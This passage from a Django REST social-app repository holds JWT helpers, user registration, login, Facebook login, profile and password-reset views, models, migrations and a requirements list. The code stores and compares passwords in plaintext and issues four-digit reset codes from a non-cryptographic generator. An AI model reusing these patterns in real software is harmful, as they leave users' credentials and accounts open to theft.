"license_type": "no_license", "max_line_length": 115, "num_lines": 65, "path": "/my_utils/jwt_authen.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "import datetime\nimport logging\nimport time\n\nimport jwt\nfrom django.http import JsonResponse\nfrom django.views import View\nfrom requests.api import request\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom my_utils import response_status, cus_exception\nfrom socialapi.settings import JWT_TOKEN_EXPIRATION_DAYS, SECRET_KEY\n\n\nclass JwtAuthen():\n @staticmethod\n def create_jwt(data):\n token = {\n 'iat': time.time(),\n 'nbf': time.time(),\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=JWT_TOKEN_EXPIRATION_DAYS),\n 'data': data\n }\n return jwt.encode(token, SECRET_KEY)\n \n @staticmethod\n def check_jwt(request):\n try:\n authen_token = request.headers['Authorization'].split()[1]\n token = jwt.decode(authen_token, SECRET_KEY, ['HS256'])\n if(token):\n cur_time = time.time()\n if(token['exp'] > cur_time):\n return token['data']\n except Exception as e:\n logging.exception(f'Token Error:')\n return None\n \n @staticmethod\n def check_jwt_detail(request):\n try:\n authen_token = request.headers['Authorization'].split()[1]\n token = jwt.decode(authen_token, SECRET_KEY, ['HS256'])\n if(token):\n cur_time = time.time()\n if(token['exp'] > cur_time):\n if(token['data'].get('email') and (token['data'].get('email') == request.data.get('email'))):\n return token['data']\n elif(token['data'].get('fb_id') and (token['data'].get('fb_id') == request.data.get('fb_id'))):\n return token['data']\n elif(token['data'].get('uid') and (token['data'].get('uid') == request.data.get('uid'))):\n return token['data']\n else:\n raise cus_exception.TokenInvalid()\n except Exception as e:\n logging.exception(f'Token Error:')\n raise cus_exception.TokenInvalid()\n\nclass CheckAuthen(BasePermission):\n\n def has_permission(self, request, view):\n return bool(JwtAuthen.check_jwt_detail(request))" }, { "alpha_fraction": 0.49529513716697693, "alphanum_fraction": 0.699743390083313, "avg_line_length": 15.942028999328613, "blob_id": "b955f4368639f730c698e5183be22f69d09cc1be", "content_id": "7dc3877855721407ad0f5f9b75cc6773fc0eea20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1169, "license_type": "no_license", "max_line_length": 37, "num_lines": 69, "path": "/requirements.txt", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": 
"amqp==2.5.1\nasn1crypto==0.24.0\nbackports.ssl-match-hostname==3.5.0.1\nbcrypt==3.1.7\nbilliard==3.5.0.5\ncached-property==1.3.1\ncelery==4.0.2\ncertifi==2019.9.11\ncffi==1.13.0\nchardet==3.0.4\nClick==7.0\nconfigparser==4.0.2\ncontextlib2==0.6.0.post1\ncoverage==4.5.1\ncryptography==2.8\nDjango==1.10.4\ndjangorestframework==3.6.3\ndocker==2.5.1\ndocker-compose==1.17.1\ndocker-pycreds==0.2.1\ndockerpty==0.4.1\ndocopt==0.6.2\nenum34==1.1.6\nFlask==1.1.1\nfuncsigs==1.0.2\nfunctools32==3.2.3.post2\ngyp==0.1\nidna==2.5\nimportlib-metadata==0.23\nipaddress==1.0.17\nitsdangerous==1.1.0\nJinja2==2.10.3\njsonschema==2.6.0\nkeyring==10.6.0\nkeyrings.alt==3.0\nkombu==4.6.5\nMarkupSafe==1.1.1\nmock==2.0.0\nmore-itertools==5.0.0\nmysql-connector-python-rf==2.2.2\nolefile==0.46\nparamiko==2.6.0\npathlib2==2.3.5\npbr==3.1.1\nPillow==4.2.1\npsutil==5.4.2\npycairo==1.16.2\npycparser==2.19\npycrypto==2.6.1\npygobject==3.26.1\nPyNaCl==1.3.0\npyOpenSSL==17.5.0\nPyPDF2==1.26.0\npytz==2019.3\npyxdg==0.25\nPyYAML==3.12\nredis==3.2.1\nrequests==2.18.1\nscandir==1.10.0\nSecretStorage==2.3.1\nsix==1.12.0\nstormssh==0.7.0\ntermcolor==1.1.0\ntexttable==0.9.1\nurllib3==1.21.1\nvine==1.3.0\nwebsocket-client==0.44.0\nWerkzeug==0.16.0\nzipp==0.6.0\n" }, { "alpha_fraction": 0.7258444428443909, "alphanum_fraction": 0.754124104976654, "avg_line_length": 38.8125, "blob_id": "b59ff9575c2f51e423743cd370b7ff5068a50b4c", "content_id": "754156ae955f82e6d314bb759c999c567fc3861d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1333, "license_type": "no_license", "max_line_length": 76, "num_lines": 32, "path": "/my_utils/response_status.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom collections import namedtuple\n\nErrorCodeProperties = namedtuple(\"ErrorCodeProperties\", [\"code\", \"message\"])\n\nSUCCESS = ErrorCodeProperties(0, \"Thành Công\")\nFAIL = ErrorCodeProperties(-1, \"Thất Bại\")\n\nMODULE_NOT_ALLOW = ErrorCodeProperties(-8, \"Module không được phép sử dụng\")\n\nPERMISSION_DENY = ErrorCodeProperties(-9, \"Không Có Quyền\")\nUSER_BANNED = ErrorCodeProperties(-2, \"Tài Khoản Tạm Thời Bị Khóa\")\nUSER_LOGIN_FAILED = ErrorCodeProperties(-3, \"User Hoặc Password không đúng\")\nUSER_INACTIVATE = ErrorCodeProperties(-4, \"User Chưa Active\")\nUSER_INVALID_TOKEN = ErrorCodeProperties(-5, \"Token Không Hợp Lệ\")\nUSER_EXISTED = ErrorCodeProperties(-6, \"User Đã Tồn Tại\")\nUSER_NOT_EXISTED = ErrorCodeProperties(-7, \"User Không Tồn Tại\")\n\n\nERROR = ErrorCodeProperties(-10, \"Lỗi\")\nSERVER_ERROR = ErrorCodeProperties(-11, \"Server Lỗi\")\n\nEXCEPTION = ErrorCodeProperties(-100, \"Excection\")\n\nINVALID_DATA = ErrorCodeProperties(-110, \"Invalid Data\")\nINVALID_PARAM = ErrorCodeProperties(-111, \"Invalid Param\")\nINVALID_SIGNATURE = ErrorCodeProperties(-112, \"Invalid Signature\")\nINVALID_METHOD = ErrorCodeProperties(-200, \"Invalid Method\")\n\nNOT_FOUND = ErrorCodeProperties(-404, \"Không Tìm Thấy\")\nBAD_REQUEST = ErrorCodeProperties(-400, \"Request Ngu\")" }, { "alpha_fraction": 0.6715379357337952, "alphanum_fraction": 0.6729297041893005, "avg_line_length": 35.871795654296875, "blob_id": "c1d9dd2d63aa6ef829199f0a30c0bd5df9fdeb27", "content_id": "3a8045b33c3abb944d2fd08fa914786a87557abe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1437, "license_type": "no_license", "max_line_length": 91, "num_lines": 39, "path": 
"/serverapi/views/users.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from datetime import datetime\n\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\nfrom api.models import User\nfrom my_utils.check_fields import check_required_fields\nfrom my_utils.jwt_authen import CheckAuthen\nfrom my_utils import response_status\nfrom my_utils.response_utils import response_fail\nfrom scmodels.serializers.user_serializers import GetUserProfileSerializer\n\n# Create your views here.\n\nclass ListUser(APIView):\n permission_classes = [CheckAuthen]\n\n def get(self, request, *args, **kwargs):\n required_fields = [\"last_uid\", \"limit\", \"uid\"]\n check_required_fields(required_fields, self.kwargs)\n\n limit = self.kwargs.get(\"limit\")\n last_uid = 0 if self.kwargs.get(\"last_uid\") == \"0\" else self.kwargs.get(\"last_uid\")\n check_point = datetime.now()\n if(last_uid):\n try:\n user = User.objects.get(uid=last_uid)\n check_point = user.created_at\n except Exception as e:\n return response_fail()\n \n query_ret = User.objects.collect_list_users(check_point, limit)\n responseData = GetUserProfileSerializer(query_ret, many=True).data\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"responseData\": responseData,\n })" }, { "alpha_fraction": 0.5163934230804443, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 24.41666603088379, "blob_id": "c15d9a2527e572c59d12737a2c74bec953f40135", "content_id": "0ac3e94542678ff0a6a57a3c46ac4390e07e178f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "no_license", "max_line_length": 112, "num_lines": 24, "path": "/api/migrations/0013_auto_20191026_1052.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-26 10:52\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0012_auto_20191026_1052'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='ForgetPass',\n new_name='UserOTP',\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 26, 10, 52, 43, 846655, tzinfo=utc)),\n ),\n ]\n" }, { "alpha_fraction": 0.5512367486953735, "alphanum_fraction": 0.6007066965103149, "avg_line_length": 31.342857360839844, "blob_id": "a63945e8215392493ff1c8c8d74b091deea521ec", "content_id": "b65ed0806387fc72bc938d1044587aa18c63d8db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1132, "license_type": "no_license", "max_line_length": 155, "num_lines": 35, "path": "/api/migrations/0012_auto_20191026_1052.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-26 10:52\n\nimport datetime\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0011_auto_20191025_1037'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ForgetPass',\n fields=[\n ('uid', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, 
to=settings.AUTH_USER_MODEL)),\n ('email', models.EmailField(max_length=254, unique=True)),\n ('otp_code_reset_pass', models.CharField(max_length=10)),\n ],\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 26, 10, 52, 8, 45934, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='password',\n field=models.CharField(max_length=20),\n ),\n ]\n" }, { "alpha_fraction": 0.5873563289642334, "alphanum_fraction": 0.5879310369491577, "avg_line_length": 40.82692337036133, "blob_id": "4b89e487b6580fadc496e542e15480fa992c517c", "content_id": "60cc3c8ba444d2e7c785ba3cb1cc924255e12a55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8700, "license_type": "no_license", "max_line_length": 134, "num_lines": 208, "path": "/api/views.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "import json\nimport random\nimport string\nfrom pprint import pprint\n\nimport facebook\nimport jwt\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import status\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom api.models import User, UserOTP\nfrom scmodels.serializers.user_serializers import (GetUserProfileSerializer,\n UpdateUserProfileSerializer,\n UserResetPassSerializer, UserSerializer\n )\nfrom my_utils.check_fields import check_required_fields\nfrom my_utils import response_status\nfrom my_utils.jwt_authen import CheckAuthen, JwtAuthen\nfrom my_utils.log_module import logger_socialapi\nfrom my_utils.response_utils import response_fail, response_success\nfrom socialapi.settings import SECRET_KEY\nfrom api.tasks import email_reset_pass\n\n\nclass CreateUser(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"email\", \"password\"]\n check_required_fields(required_fields, request.data)\n \n user_serializer = UserSerializer(data=request.data)\n\n if(user_serializer.is_valid()):\n try:\n email = user_serializer.validated_data.get(\"email\")\n User.objects.get(email=email)\n return Response({\n 'ResponseCode': response_status.USER_EXISTED.code,\n 'ResponseMessage': response_status.USER_EXISTED.message\n })\n except ObjectDoesNotExist as e:\n user = user_serializer.save()\n logger_socialapi.info(f'SUCCESS: Created User {user.email}')\n responseData = dict(GetUserProfileSerializer(user).data)\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"token\": JwtAuthen.create_jwt(responseData),\n \"responseData\": responseData,\n })\n except Exception as e:\n logger_socialapi.exception(f'Error: Register Failed')\n return response_fail()\n elif(user_serializer.errors):\n return Response({\n 'ResponseCode': response_status.FAIL.code,\n 'ResponseMessage': user_serializer.errors\n })\n\n\nclass LoginUserFace(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"fb_id\", \"access_token\"]\n check_required_fields(required_fields, request.data)\n \n try:\n fb_id = request.data.get('fb_id')\n access_token = request.data.get('access_token')\n profile = facebook.GraphAPI(access_token=access_token).get_object('me', fields='email,name,gender,birthday')\n except Exception as e:\n logger_socialapi.exception(f'Error: Register Facebook Failed')\n return response_fail()\n if(fb_id == profile.get('id')):\n fb_id, 
email, name = profile.get('id'), profile.get('email'), profile.get('name')\n try:\n user = User.objects.get(fb_id=fb_id)\n if(hasattr(user, 'is_banned') and user.is_banned == 1):\n return Response({\n \"responseCode\": response_status.USER_BANNED.code,\n \"responseMessage\": response_status.USER_BANNED.message \n })\n # elif(hasattr(user, 'is_activated') and user.is_activated == 0):\n # return Response({\n # \"responseCode\": response_status.USER_INACTIVATE.code,\n # \"responseMessage\": response_status.USER_INACTIVATE.message \n # })\n responseData = dict(GetUserProfileSerializer(user).data)\n except ObjectDoesNotExist as e:\n logger_socialapi.info(f'Register user {fb_id}')\n user = User.objects.create(fb_id=fb_id, email=email, fullname=name)\n responseData = dict(GetUserProfileSerializer(user).data)\n except Exception as e:\n logger_socialapi.exception(f'Error: Register Failed {fb_id}')\n return response_fail()\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"token\": JwtAuthen.create_jwt(responseData),\n \"responseData\": responseData,\n })\n else:\n logger_socialapi.exception(f'Error: Register Failed {fb_id}')\n return response_fail()\n\n\n# User login if sucess, then return jwt vs user data\nclass LoginUser(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"email\", \"password\"]\n check_required_fields(required_fields, request.data)\n \n try:\n email = request.data.get('email')\n password = request.data.get('password')\n user = User.objects.get(email=email, password=password)\n if(hasattr(user, 'is_banned') and user.is_banned == 1):\n return Response({\n \"responseCode\": response_status.USER_BANNED.code,\n \"responseMessage\": response_status.USER_BANNED.message \n })\n # elif(hasattr(user, 'is_activated') and user.is_activated == 0):\n # return Response({\n # \"responseCode\": response_status.USER_INACTIVATE.code,\n # \"responseMessage\": response_status.USER_INACTIVATE.message \n # })\n else:\n responseData = dict(GetUserProfileSerializer(user).data)\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"token\": JwtAuthen.create_jwt(responseData),\n \"responseData\": responseData,\n })\n except ObjectDoesNotExist as e:\n return Response(\n {\n \"responseCode\": response_status.USER_LOGIN_FAILED.code,\n \"responseMessage\": response_status.USER_LOGIN_FAILED.message,\n }\n )\n\n\nclass UpdateUser(APIView):\n permission_classes = [CheckAuthen]\n\n def put(self, request, *args, **kwargs):\n required_fields = [\"uid\", \"fullname\", \"gender\", \"birthday\"]\n check_required_fields(required_fields, request.data)\n\n uid = request.data.get(\"uid\")\n try:\n user = User.objects.get(uid=uid)\n user_serializer = UpdateUserProfileSerializer(user, data=request.data)\n user_serializer.is_valid(raise_exception=True)\n user_serializer.save()\n responseData = dict(user_serializer.data)\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"responseData\": responseData,\n })\n except ObjectDoesNotExist as e:\n return Response({\n \"ResponseCode\": response_status.USER_NOT_EXISTED.code,\n \"ResponseMessage\": response_status.USER_NOT_EXISTED.message\n })\n except Exception as e:\n return response_fail()\n \n\nclass LogoutUser(APIView):\n\n def get(self, request, *args, **kwargs):\n return response_success()\n\nclass 
UserResetPass(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"email\"]\n check_required_fields(required_fields, request.data)\n email = request.data.get(\"email\")\n try:\n user = User.objects.get(email=email)\n otp_code_reset_pass = ''.join(random.choices(string.digits, k = 4))\n user_otp = UserResetPassSerializer(data={\"uid\": str(user.uid),\"email\": email, \"otp_code_reset_pass\": otp_code_reset_pass})\n user_otp.is_valid(raise_exception=True)\n user_otp.save()\n #email_reset_pass.delay(email, otp_code_reset_pass)\n return response_success()\n except ObjectDoesNotExist as e:\n return Response({\n \"ResponseCode\": response_status.USER_NOT_EXISTED.code,\n \"ResponseMessage\": response_status.USER_NOT_EXISTED.message\n })\n except Exception as e:\n return response_fail()\n\n\nclass HelloView(APIView):\n permission_classes = [CheckAuthen]\n\n def get(self, request):\n return Response('Huraaaaa')\n" }, { "alpha_fraction": 0.6792828440666199, "alphanum_fraction": 0.6917330622673035, "avg_line_length": 36.185184478759766, "blob_id": "494351474f4fb5d5509a2d91978dab7bb0acb2f3", "content_id": "3d9597d929ecf936b52e5896ca819786ad59dc26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2008, "license_type": "no_license", "max_line_length": 99, "num_lines": 54, "path": "/api/models.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "\nimport datetime\nimport uuid\n\nfrom django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass UserManager(BaseUserManager):\n \n def collect_list_users(self, check_point, limit, *args, **kwargs):\n return User.objects.filter(created_at__lte=check_point).order_by('-created_at')[:limit]\n\nclass User(AbstractBaseUser, PermissionsMixin):\n GENDER_CHOICES = (\n ('1', 'MALE'),\n ('2', 'FEMALE'),\n ('3', 'OTHERS'),\n )\n uid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n email = models.EmailField(unique=True, db_index=True, null=True, editable=False)\n fb_id = models.CharField(unique=True, max_length=255, db_index=True, null=True, editable=False)\n password = models.CharField(max_length=20, null=False)\n account_type = models.IntegerField(null=False, editable=False) #0: Email, 1: Face\n fullname = models.CharField(max_length=255, null=True)\n gender = models.BooleanField(choices=GENDER_CHOICES, max_length=1, null=True)\n birthday = models.DateField(null=True)\n avatar = models.CharField(max_length=255, null=True)\n is_banned = models.BooleanField(default=False, null=False)\n created_at = models.DateTimeField(default=timezone.now(), null=False)\n is_activated = models.BooleanField(default=False, null=False)\n\n objects = UserManager()\n \n def save(self, *args, **kwargs):\n self.account_type = 1 if(self.fb_id) else 0\n super().save(*args, **kwargs)\n\n\n USERNAME_FIELD = 'uid'\n\n class Meta:\n ordering = ['created_at']\n \n # def __str__(self):\n # return self.email\n\nclass UserOTP(models.Model):\n uid = models.CharField(primary_key=True, max_length=255, editable=False)\n email = models.EmailField(unique=True, null=False, blank=False)\n otp_code_reset_pass = models.CharField(max_length=10)\n\n objects = models.Manager()" }, { "alpha_fraction": 0.5944369435310364, "alphanum_fraction": 0.6191117167472839, "avg_line_length": 53.36585235595703, "blob_id": 
"b500eeffb7649fd264745a52aeb271aff27467d9", "content_id": "3e514d80ccbfba5feb0d108f58253473dec4dee5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2229, "license_type": "no_license", "max_line_length": 266, "num_lines": 41, "path": "/api/migrations/0001_initial.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-16 15:22\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('auth', '0011_update_proxy_permissions'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('uid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('email', models.EmailField(db_index=True, max_length=254, unique=True)),\n ('password', models.CharField(max_length=255)),\n ('account_type', models.CharField(default='Email', max_length=100)),\n ('fullname', models.CharField(max_length=255, null=True)),\n ('gender', models.BooleanField(choices=[(False, 'Nam'), (True, 'Nu')], null=True)),\n ('birthday', models.DateField(null=True)),\n ('avatar', models.CharField(max_length=255, null=True)),\n ('is_banned', models.BooleanField(default=False)),\n ('created_at', models.DateTimeField(default=datetime.datetime(2019, 10, 16, 15, 22, 46, 427699, tzinfo=utc))),\n ('is_activated', models.BooleanField(default=False)),\n ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. 
A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),\n ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),\n ],\n options={\n 'ordering': ['created_at'],\n },\n ),\n ]\n" }, { "alpha_fraction": 0.5356125235557556, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 27.079999923706055, "blob_id": "1f090da87343ebf8ab7bf6015f93e1af00dd09fc", "content_id": "16e4f8ae8ce3c9fb9773cdd963d00c8bf5e8e868", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 111, "num_lines": 25, "path": "/api/migrations/0017_auto_20191027_0918.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-27 09:18\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0016_auto_20191027_0900'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 27, 9, 18, 12, 265723, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='userotp',\n name='uid',\n field=models.CharField(editable=False, max_length=255, primary_key=True, serialize=False),\n ),\n ]\n" }, { "alpha_fraction": 0.6503401398658752, "alphanum_fraction": 0.6523809432983398, "avg_line_length": 37.71052551269531, "blob_id": "52e32849c30dc3455652b32ad0e2c74d137a1405", "content_id": "f45f44cdc6a2868ebfbc792a3237dd89ac4bfed4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 126, "num_lines": 38, "path": "/scmodels/serializers/user_serializers.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom api.models import User, UserOTP\n\nclass UserSerializer(serializers.ModelSerializer):\n password = serializers.CharField(min_length=3, max_length=16, required=True)\n email = serializers.EmailField(required=True)\n class Meta:\n model = User\n fields = ('email', 'password')\n\nclass GetUserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('uid', 'email', 'account_type', 'fullname', 'gender', 'birthday', 'is_banned', 'is_activated', 'created_at')\n\n # def to_representation(self, instance):\n # ret = super().to_representation(instance)\n # ret['uid'] = instance.uid.hex\n # return ret\n\nclass UpdateUserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('uid', 'fullname', 'gender', 'birthday')\n\nclass UserResetPassSerializer(serializers.ModelSerializer):\n uid = serializers.CharField(required=True)\n email = serializers.CharField(required=True)\n \n class Meta:\n model = UserOTP\n fields = ('uid', 'email', 'otp_code_reset_pass')\n \n def create(self, validated_data):\n user_otp = UserOTP.objects.update_or_create(email=validated_data.get('email', None),\n defaults={'otp_code_reset_pass': validated_data.get('otp_code_reset_pass', None),\n 'uid': validated_data.get('uid', None)})\n return user_otp" }, { "alpha_fraction": 0.6990049481391907, "alphanum_fraction": 
0.6990049481391907, "avg_line_length": 27.785715103149414, "blob_id": "a21ef4cc80cf5325ad699c9bceb0ef690db0fa48", "content_id": "2faa79a0391f76d937f2694bafc695c77e8908c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 402, "license_type": "no_license", "max_line_length": 57, "num_lines": 14, "path": "/my_utils/response_utils.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from rest_framework.response import Response\nfrom my_utils import response_status\n\ndef response_fail():\n return Response({\n 'ReponseCode': response_status.FAIL.code,\n 'ReponseMessage': response_status.FAIL.message\n })\n\ndef response_success():\n return Response({\n 'ReponseCode': response_status.SUCCESS.code,\n 'ReponseMessage': response_status.SUCCESS.message\n })" }, { "alpha_fraction": 0.5328571200370789, "alphanum_fraction": 0.6100000143051147, "avg_line_length": 27, "blob_id": "6970788ac003d2aa823ff68003a8551403ffca57", "content_id": "5f278fed7405d54f25c7c1d620438cddc6c9daaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 700, "license_type": "no_license", "max_line_length": 112, "num_lines": 25, "path": "/api/migrations/0014_auto_20191026_1233.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-26 12:33\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0013_auto_20191026_1052'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 26, 12, 33, 34, 865185, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='userotp',\n name='uid',\n field=models.CharField(max_length=255, primary_key=True, serialize=False, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.6897106170654297, "alphanum_fraction": 0.6961414813995361, "avg_line_length": 45.074073791503906, "blob_id": "c5a20652a8f42a2ebd885293f8ee011e242425f4", "content_id": "c967bd148896bc9258a2199adfd6ca2163c825ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1244, "license_type": "no_license", "max_line_length": 107, "num_lines": 27, "path": "/api/urls.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "\"\"\"socialapi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import include, path\nfrom api.views import CreateUser, LoginUser, HelloView, LoginUserFace, LogoutUser, UpdateUser,UserResetPass\n\nurlpatterns = [\n path('user/', CreateUser.as_view(), name='createuser'),\n path('user/email/', LoginUser.as_view(), name='loginuser'),\n path('user/fb/', LoginUserFace.as_view(), name='loginuserface'),\n path('user/logout/', LogoutUser.as_view(), name='logout'),\n path('user/update/', UpdateUser.as_view(), name='update'),\n path('user/resetpass/', UserResetPass.as_view(), name='resetpass'),\n path('hello/', HelloView.as_view(), name='hello'),\n]\n" }, { "alpha_fraction": 0.7525597214698792, "alphanum_fraction": 0.755972683429718, "avg_line_length": 29.894737243652344, "blob_id": "194dd51be294504ff5db9590aac90c7a1e93dda0", "content_id": "583a49caced1ad822a9930e9c34df20a50eea81c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 586, "license_type": "no_license", "max_line_length": 69, "num_lines": 19, "path": "/socialapi/celery.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nimport os\n\nfrom celery import Celery\nfrom socialapi import settings\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'socialapi.settings')\n\napp = Celery('socialapi')\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n# Auto detect all task file in all Django installed app\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\[email protected](bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request))" }, { "alpha_fraction": 0.5223880410194397, "alphanum_fraction": 0.6014925241470337, "avg_line_length": 25.799999237060547, "blob_id": "798bea4616e73c55ea8586186f908a9ddb8ed533", "content_id": "4ad1d132d5c383f0e1ce1623067bacd45796f43a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 670, "license_type": "no_license", "max_line_length": 110, "num_lines": 25, "path": "/api/migrations/0003_auto_20191018_0952.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-18 09:52\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0002_auto_20191017_1726'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='account_type',\n field=models.IntegerField(default=1, max_length=100),\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 18, 9, 52, 57, 49039, tzinfo=utc)),\n ),\n ]\n" }, { "alpha_fraction": 0.5291750431060791, "alphanum_fraction": 0.6257545351982117, "avg_line_length": 23.850000381469727, "blob_id": "ccddab6d530b53c1d0aa3e20f4322a49a91da279", "content_id": "02a05104f0890446ab9bb9057d0b79dd279ba895", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 